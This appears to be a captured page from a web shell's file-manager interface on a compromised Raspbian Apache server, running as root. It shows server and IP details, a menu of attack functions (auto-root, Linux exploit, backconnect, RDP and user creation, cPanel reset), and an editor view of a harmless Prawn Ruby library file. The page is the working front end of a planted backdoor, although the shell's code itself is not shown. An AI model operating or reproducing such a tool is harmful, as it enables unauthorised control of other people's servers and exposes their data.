Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
prawn /
table /
cell /
[ HOME SHELL ]
Name
Size
Permission
Action
image.rb
1.38
KB
-rw-r--r--
in_table.rb
625
B
-rw-r--r--
span_dummy.rb
2.21
KB
-rw-r--r--
subtable.rb
1.27
KB
-rw-r--r--
text.rb
4.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : subtable.rb
# encoding: utf-8 # subtable.rb: Yo dawg. # # Copyright January 2010, Brad Ediger. All Rights Reserved. # # This is free software. Please see the LICENSE and COPYING files for details. module Prawn class Table class Cell # A Cell that contains another table. # # @private class Subtable < Cell attr_reader :subtable def initialize(pdf, point, options={}) super @subtable = options[:content] # Subtable padding defaults to zero @padding = [0, 0, 0, 0] end # Sets the text color of the entire subtable. # def text_color=(color) @subtable.cells.text_color = color end # Proxied to subtable. # def natural_content_width @subtable.cells.width end # Proxied to subtable. # def min_width @subtable.cells.min_width end # Proxied to subtable. # def max_width @subtable.cells.max_width end # Proxied to subtable. # def natural_content_height @subtable.cells.height end # Draws the subtable. # def draw_content @subtable.draw end end end end end
Close